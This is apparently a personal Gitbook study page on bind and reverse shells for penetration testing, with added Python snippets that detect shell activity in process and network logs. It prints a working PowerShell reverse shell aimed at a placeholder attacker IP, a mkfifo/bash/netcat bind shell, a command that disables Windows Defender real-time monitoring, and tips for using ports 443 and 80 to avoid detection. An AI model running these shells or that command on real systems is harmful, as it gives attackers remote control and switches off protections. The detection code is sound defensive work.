Noirchapeau's Gitbook

Shells & Payloads: Shell Overview

Introduction

  • Shell Definition: Programs providing CLI (Command Line Interface) access to systems

    • Common terminology: "catching" or "popping" a shell = successful remote access

    • Primary goal: Obtain interactive system control for:

      • Privilege escalation

      • System pivoting

      • File transfers

      • Persistence establishment

Shell Types Overview

1. Bind Shells

  • Definition: Listener running on target system awaiting attacker connection

  • Key Characteristics:

    • Requires target to run listener

    • Often blocked by firewalls

    • Best suited for internal network testing

Basic Bind Shell Setup

# On target system (listener):
nc -lvnp 7777

# On attacker system (client):
nc -nv <target-IP> 7777

Interactive Bind Shell Setup

# On target system:
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l <target-IP> 7777 > /tmp/f

2. Reverse Shells

  • Definition: Target initiates connection to attacker's system

  • Advantages:

    • Better firewall bypass (uses outbound connections)

    • More successful in real-world scenarios

    • Easier to maintain persistence

Basic Reverse Shell Setup

# On attacker system (listener):
sudo nc -lvnp 443

# On Windows target (PowerShell):
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<attacker-IP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
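Seen from the defender's side, both shell types above leave a recognisable trace in process-creation telemetry: a listener with a shell piped into it (bind) or a shell whose stdio is wired to an outbound socket (reverse). The following is an added example for these notes, not code from the original page; the event records are constructed and the field names ("pid", "cmdline") are an assumption you would map from your own log source.

```python
"""Flag bind/reverse shell indicators in process-creation telemetry.
Added example for these notes, not code from the original page; the records
in SAMPLE_EVENTS are constructed. Real sources (auditd EXECVE, Sysmon Event
ID 1, EDR process logs) carry the same data under other field names."""
import re

# A shell/interpreter, a fifo (the trick in the notes) or an iex call in the command line.
SHELL_ATTACHED = re.compile(
    r"(^|/|\s)(ba|z|da|k)?sh(\s|$)|powershell|cmd\.exe|python|\bmkfifo\b|\biex\b", re.I)
# Listener side: netcat/socat told to listen (bind shell when a shell is piped in).
BIND_PATTERNS = [re.compile(r"\bnc(at)?\b.*\s-[a-z]*l[a-z]*\b", re.I),   # nc -l / -lvnp
                 re.compile(r"\bsocat\b.*tcp-listen", re.I)]
# Client side: a shell's stdio wired to an outbound socket (reverse shell).
REVERSE_PATTERNS = [
    re.compile(r"/dev/tcp/\d+\.\d+\.\d+\.\d+/\d+"),                   # bash redirection
    re.compile(r"TCPClient\s*\(", re.I),                                 # .NET socket (PowerShell)
    re.compile(r"\bnc(at)?\b\s+(-\w+\s+)*\d+\.\d+\.\d+\.\d+\s+\d+", re.I),  # nc <ip> <port>
]


def classify(cmdline):
    """Return (category, severity) for one command line, or None."""
    shell = bool(SHELL_ATTACHED.search(cmdline))
    # Listener rules go first: 'nc -l <ip> <port>' also matches the nc client
    # rule below, but -l makes it the listening (bind) side.
    if any(p.search(cmdline) for p in BIND_PATTERNS):
        return ("bind-shell", "high") if shell else ("listener", "medium")
    if shell and any(p.search(cmdline) for p in REVERSE_PATTERNS):
        return ("reverse-shell", "high")
    return None


def scan(events):
    """Return (pid, category, severity) for every event that trips a rule."""
    return [(e["pid"], *hit) for e in events if (hit := classify(e["cmdline"]))]


# Constructed sample telemetry; the first four mirror the commands in these notes.
SAMPLE_EVENTS = [
    {"pid": 101, "cmdline": "nc -lvnp 7777"},
    {"pid": 102, "cmdline": "rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 "
                            "| nc -l 10.10.10.5 7777 > /tmp/f"},
    {"pid": 103, "cmdline": "powershell -nop -c \"$client = New-Object "
                            "System.Net.Sockets.TCPClient('10.10.14.3',443); ... iex $data\""},
    {"pid": 104, "cmdline": "bash -i >& /dev/tcp/10.10.14.3/443 0>&1"},
    {"pid": 105, "cmdline": "ls -la /tmp"},
    {"pid": 106, "cmdline": "ssh -l admin 10.10.10.9"},
]
```

A bare `nc -l` with nothing piped into it is only rated medium: it is a listener, not yet a shell, which is exactly the difference between the basic and the interactive bind shell setups above.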

Shell Environment Identification

Common Terminal Emulators

  • Windows: Windows Terminal, cmder, PuTTY

  • Linux: xterm, GNOME Terminal, Konsole

  • MacOS: Terminal, iTerm2

  • Cross-platform: kitty, Alacritty

Shell Recognition Commands

# View current shell process
ps

# Check shell environment variables
env | grep SHELL

Best Practices & Tips

1. Port Selection

  • Use common ports for better evasion:

    • 443 (HTTPS)

    • 80 (HTTP)

    • Avoid suspicious uncommon ports
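The flip side of picking 443 or 80 is that a raw netcat or PowerShell shell never speaks TLS or HTTP on them, so a sensor that checks the first payload bytes against the port's expected protocol catches the mismatch. This is an added example for these notes, not code from the original page; the flows and their payload bytes are constructed, and the 203.0.113.0/24 addresses are documentation-range placeholders.

```python
"""Spot plaintext shell traffic riding on 'common' ports: a shell on 443 never
sends a TLS handshake and one on 80 never sends an HTTP request line. Added
example for these notes, not original code; SAMPLE_FLOWS is constructed."""
import re

HTTP_LINE = re.compile(rb"^(?:(?:GET|POST|PUT|HEAD|DELETE|OPTIONS|PATCH) \S+ HTTP/1\.[01]"
                       rb"|HTTP/1\.[01] \d{3}[^\r\n]*)\r?\n")


def is_tls_handshake(data):
    """TLS record: type 0x16, version 0x03 0x00..0x04, 2-byte length, then a
    ClientHello (0x01) or ServerHello (0x02) handshake header."""
    return (len(data) >= 6 and data[0] == 0x16 and data[1] == 0x03
            and data[2] <= 0x04 and data[5] in (0x01, 0x02))


def is_http(data):
    """Request line or status line, whichever side spoke first."""
    return HTTP_LINE.match(data) is not None


# Port -> the check its first payload must satisfy; extend per environment.
EXPECTED = {443: is_tls_handshake, 80: is_http}


def port_protocol_mismatches(flows):
    """Return (src, dst, dport, preview) for flows whose first payload does
    not look like the protocol the port is meant to carry."""
    hits = []
    for f in flows:
        check = EXPECTED.get(f["dport"])
        if check is not None and not check(f["payload"]):
            hits.append((f["src"], f["dst"], f["dport"], f["payload"][:16]))
    return hits


SAMPLE_FLOWS = [   # constructed; payload = first bytes seen on the connection
    # genuine HTTPS: TLS record header carrying a ClientHello
    {"src": "10.10.10.5", "dst": "203.0.113.10", "dport": 443,
     "payload": bytes.fromhex("16030100c4010000c00303") + b"\x00" * 32},
    # PowerShell reverse shell from the notes, echoing its prompt over port 443
    {"src": "10.10.10.7", "dst": "10.10.14.3", "dport": 443,
     "payload": b"PS C:\\Users\\svc> "},
    {"src": "10.10.10.8", "dst": "203.0.113.10", "dport": 80,
     "payload": b"GET /index.html HTTP/1.1\r\nHost: example.com\r\n\r\n"},
    # bash -i 2>&1 piped to nc on port 80: the first bytes are a shell message
    {"src": "10.10.10.9", "dst": "10.10.14.3", "dport": 80,
     "payload": b"bash: no job control in this shell\n"},
    {"src": "10.10.10.9", "dst": "10.10.10.1", "dport": 22, "payload": b"SSH-2.0-OpenSSH"},
]
```

Only the two shells are reported; the real TLS and HTTP flows pass, and port 22 is skipped because no expectation is registered for it.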

2. Antivirus Evasion

# Disable Windows Defender (if needed)
Set-MpPreference -DisableRealtimeMonitoring $true

3. Firewall Considerations

  • Bind shells:

    • Require incoming connections

    • Often blocked by firewalls

    • Best for internal testing

  • Reverse shells:

    • Use outbound connections

    • Better success rate

    • Preferred for external testing

4. Shell Stabilization

  • Consider using:

    • Named pipes for persistence

    • Error handling for stability

    • Proper cleanup after session

Payload Types

  • Network data packets

  • Programming instructions

  • Various malware forms

  • Command execution scripts

Security Implications

  • Shells provide direct OS access

  • Enable system command control

  • Facilitate data exfiltration

  • Allow privilege escalation

  • Support lateral movement

Quick Reference

Common Shell Indicators

  • $ prompt = Bash/Ksh/POSIX shell

  • > prompt = Windows CMD

  • PS> prompt = PowerShell

Key Commands Cheatsheet

# Basic listener
nc -lvnp <port>

# Basic connection
nc -nv <IP> <port>

# Check current shell
echo $SHELL

# Create named pipe
mkfifo /tmp/f